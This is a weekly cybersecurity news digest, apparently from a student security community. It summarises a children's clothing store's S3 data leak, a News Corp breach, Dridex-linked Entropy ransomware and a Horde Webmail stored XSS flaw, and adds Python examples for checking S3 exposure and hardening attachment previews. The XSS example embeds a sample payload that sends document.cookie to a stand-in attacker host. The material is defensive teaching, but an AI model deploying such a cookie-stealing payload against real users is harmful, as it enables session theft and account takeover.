Cyber Security News of the week — 21.02.2022|25.02.2022
Kids Luxury Clothing Store Melijoe Exposed 200GB of Customers’ Data
Melijoe, a popular Paris-based online luxury clothing store for kids, was caught exposing the personal and sensitive data of its customers worldwide, many of them children.
The cause was a misconfigured Amazon S3 bucket that had been left open to public access with no password or other authentication, so anyone who knew how to find misconfigured storage could have accessed the data.
Researchers at Safety Detectives identified three datasets containing records of customers' purchases, preferences, and wishlists.
Further analysis of these datasets revealed sensitive information such as the following:
In a blog post published on February 21st, 2022, Safety Detectives said its cybersecurity team had informed Melijoe about the exposure on November 12th, 2021, but received no response from the company.
The French Computer Emergency Response Team (CERT-FR) initially confirmed that it would notify Melijoe; a month later, however, the agency said that the shopping site had not responded to its alert either, which is also a clear violation of the General Data Protection Regulation (GDPR).
On January 10th, 2022, CNIL, the independent French data protection authority, confirmed that the authorities were handling the issue.
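The exposure described above came down to one bucket whose policy, ACL or Block Public Access settings allowed anonymous reads. The Python below is an added example, not code from Safety Detectives or Melijoe, that evaluates those three documents for a bucket and reports whether it is effectively public; the bucket name, account ID, role name and every value in the samples are constructed for illustration.

```python
"""Added example (not from the article or from Melijoe/Safety Detectives):
decide whether an S3 bucket is effectively public from the three documents
that govern it. Input shapes mirror `aws s3api get-bucket-policy`,
`get-bucket-acl` and `get-public-access-block`; all sample values are constructed."""
import json

# ACL grantee groups that mean "everyone" / "anyone with any AWS account".
PUBLIC_ACL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def load_policy(policy):
    """get-bucket-policy returns the policy as a JSON string; accept both forms."""
    return json.loads(policy) if isinstance(policy, str) else policy


def policy_public_statements(policy):
    """Allow statements open to any principal ("*" or {"AWS": "*"}) with no Condition.
    A Condition (e.g. aws:SourceVpce) may still narrow such a grant, so those are
    skipped here rather than reported as public."""
    hits = []
    for stmt in _as_list(load_policy(policy).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Condition" in stmt:
            continue
        principal = stmt.get("Principal")
        principals = _as_list(principal.get("AWS", [])) if isinstance(principal, dict) else _as_list(principal)
        if "*" in principals:
            hits.append(stmt)
    return hits


def acl_public_grants(acl):
    """ACL grants to the AllUsers / AuthenticatedUsers groups."""
    return [
        g for g in acl.get("Grants", [])
        if g.get("Grantee", {}).get("Type") == "Group"
        and g["Grantee"].get("URI") in PUBLIC_ACL_GROUPS
    ]


def assess_bucket(policy, acl, public_access_block):
    """Return {'public': bool, 'findings': [...]}. Block Public Access settings
    neutralise a public policy or ACL even when one is present, so the bucket is
    only reported public when a grant exists AND nothing blocks it."""
    cfg = public_access_block.get("PublicAccessBlockConfiguration", {})
    findings = [f"{k} is not enabled" for k in PAB_KEYS if cfg.get(k) is not True]

    open_statements = policy_public_statements(policy)
    for s in open_statements:
        findings.append(f"bucket policy allows {s.get('Action')} for Principal *")
    open_grants = acl_public_grants(acl)
    for g in open_grants:
        findings.append(f"ACL grants {g['Permission']} to {g['Grantee']['URI'].rsplit('/', 1)[-1]}")

    policy_effective = bool(open_statements) and cfg.get("RestrictPublicBuckets") is not True
    acl_effective = bool(open_grants) and cfg.get("IgnorePublicAcls") is not True
    return {"public": policy_effective or acl_effective, "findings": findings}


# --- constructed samples: an exposed bucket and its corrected counterpart ---
EXPOSED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-customer-exports/*"}],
})
EXPOSED_ACL = {"Owner": {"ID": "owner-canonical-id"}, "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
]}
NO_BLOCK = {"PublicAccessBlockConfiguration": {k: False for k in PAB_KEYS}}

HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Principal": {"AWS": "arn:aws:iam::123456789012:role/export-reader"},  # constructed
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-customer-exports/*"}],
}
PRIVATE_ACL = {"Owner": {"ID": "owner-canonical-id"}, "Grants": [EXPOSED_ACL["Grants"][0]]}
FULL_BLOCK = {"PublicAccessBlockConfiguration": {k: True for k in PAB_KEYS}}

if __name__ == "__main__":
    for name, args in {"exposed": (EXPOSED_POLICY, EXPOSED_ACL, NO_BLOCK),
                       "hardened": (HARDENED_POLICY, PRIVATE_ACL, FULL_BLOCK)}.items():
        print(name, assess_bucket(*args))
```

The point of separating "grant exists" from "grant is effective" is that enabling all four Block Public Access settings at the account level is the one control that would have closed this exposure even if someone later pushed a public policy or ACL; the findings list still reports the stray grants so they can be cleaned up.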
News Corp’s Software Supply Chain Attack Proves the Need for Enhanced Security Posture
Journalists at News Corp were targeted in a recent series of cyberattacks, which underscores the need to protect organizations' SaaS services adequately.
The attackers reportedly had access to emails, documents on Google Docs, and article drafts.
The company discovered that one of the cloud service providers it uses had been the target of persistent cyberattacks.
Those cloud service providers support the company's various business operations and are therefore upstream suppliers, which is why the incident is described as a supply chain attack.
The attack on the media conglomerate underscores the need for extended security posture management, especially since News Corp did not specify which cloud services were compromised or how the attackers gained access to them. The company's security advisors believe it was a state-sponsored operation, most likely intended to gather intelligence for the benefit of the Chinese government. This is not the first time a media company has been the target of a major cyberattack.
Dridex Malware Deploying Entropy Ransomware on Hacked Computers
Similarities have been found between the Dridex general-purpose malware and a little-known ransomware strain called Entropy, suggesting that the operators are continuing to rebrand their extortion operations under new names.
The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designed to find and obfuscate commands, and in the subroutines used to decrypt encrypted text, cybersecurity firm Sophos said in a report shared with The Hacker News.
The commonalities were uncovered following two unrelated incidents targeting an unnamed media company and a regional government agency.
The attack on the media organization used the ProxyShell exploit chain against a vulnerable Exchange Server to install a web shell, which in turn was used to spread Cobalt Strike Beacons across the network. The second attack, on the regional government organization, began with a malicious email attachment carrying the Dridex malware, which was then used to deploy additional payloads for lateral movement.
The Dridex trojan, an information-stealing botnet, is known to be the handiwork of a prolific Russia-based cybercrime group called Indrik Spider. DoppelPaymer is attributed to a splinter group tracked as Doppel Spider, which uses forked malware code developed by Indrik Spider, including the BitPaymer ransomware, as the foundation for its big game hunting operations.
The e-crime gang (also known as Evil Corp) has since cycled through numerous rebrandings of its ransomware infrastructure to get around the U.S. sanctions imposed on it in December 2019, chief among them WastedLocker, Hades, Phoenix, PayloadBIN, Grief, and Macaw. That said, it is also possible that the Entropy operators borrowed the code, either to save development effort or to mislead attribution in a deliberate false flag operation.
Properly patched machines, such as the Exchange Server in the first incident, would have forced the attackers to work much harder for initial access into the organizations they penetrated.
9-Year-Old Unpatched Email Hacking Bug Uncovered in Horde Webmail Software
Users of Horde Webmail are being urged to disable a feature to contain a nine-year-old, still-unpatched security vulnerability in the software that could be abused to gain complete access to email accounts simply by previewing an attachment.
Stored XSS attacks arise when a malicious script is saved on the server by a vulnerable web application (for example, via a comment field) and is then retrieved and sent to the victim's browser every time the stored content is requested.
The vulnerability triggers when a targeted user views an attached OpenOffice document in the browser, according to Simon Scannell, the SonarSource researcher who found it. As a result, an attacker can steal all emails the victim has sent and received.
The shortcoming was originally reported to the project maintainers on August 26, 2021, but no fix has shipped to date, even though the vendor has acknowledged the flaw.
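To make the mechanism concrete, here is an added Python example (not Horde's code) that models an attachment-preview endpoint in the vulnerable shape described above next to a hardened version, plus a download-only response matching the "disable the feature" workaround; the document text, payload URL and filename are constructed.

```python
"""Added example (not Horde's code): a minimal attachment-preview endpoint in the
vulnerable shape the Horde report describes (document content turned into HTML and
served inside the webmail session) beside two safer responses. The "document" is
constructed text; a real OpenOffice converter would be far more involved."""
import html
import re
from dataclasses import dataclass, field
from typing import Union


@dataclass
class Response:
    body: Union[str, bytes]
    headers: dict = field(default_factory=dict)


# Constructed: text a converter might extract from a crafted OpenOffice document.
MALICIOUS_DOC_TEXT = (
    "Quarterly figures attached.\n\n"
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">\n\n"
    "Regards"
)


def paragraphs(text):
    return [p.strip() for p in text.split("\n\n") if p.strip()]


def preview_unsafe(doc_text):
    """Vulnerable: attachment content is concatenated into the page as markup, so a
    tag hidden in the document runs in the victim's webmail origin (stored XSS).
    The constructed payload would send the session cookie to the attacker."""
    body = "".join(f"<p>{p}</p>" for p in paragraphs(doc_text))
    return Response(f"<html><body>{body}</body></html>",
                    {"Content-Type": "text/html; charset=utf-8"})


def preview_safe(doc_text):
    """Hardened: escape on output so the document is shown as text, and serve the
    preview under a CSP that sandboxes the page and allows no script source."""
    body = "".join(f"<p>{html.escape(p)}</p>" for p in paragraphs(doc_text))
    return Response(f"<html><body>{body}</body></html>", {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "X-Content-Type-Options": "nosniff",
    })


def download_only(raw, filename):
    """The workaround in code: do not render the attachment at all. Force a download
    with a sanitised filename (no quotes or CR/LF, which would allow header injection)
    and stop the browser from sniffing a more dangerous content type."""
    safe_name = re.sub(r'[\r\n"\\]', "", filename) or "attachment"
    return Response(raw, {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    })


# Cheap comparison check used here: any live tag that can execute script.
ACTIVE_MARKUP = re.compile(r"<\s*(script|img|svg|iframe|object|embed)\b|<[^>]*\son\w+\s*=", re.I)


def has_active_markup(page):
    return bool(ACTIVE_MARKUP.search(page))


if __name__ == "__main__":
    print("unsafe preview active:", has_active_markup(preview_unsafe(MALICIOUS_DOC_TEXT).body))
    print("safe preview active:  ", has_active_markup(preview_safe(MALICIOUS_DOC_TEXT).body))
    print(download_only(b"PK\x03\x04", "report.odt").headers["Content-Disposition"])
```

Escaping alone fixes this particular payload; the CSP sandbox and nosniff headers are there because a converter that must emit real HTML (headings, tables, images) will eventually let something through, and an isolated, script-free rendering context limits what a missed tag can do. Serving previews from a separate origin would add a further layer, but that is a deployment choice outside this snippet.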
Stay Focused. Stay Vigilant.
Cyber Security News Team — Cyber Security Community of SLIIT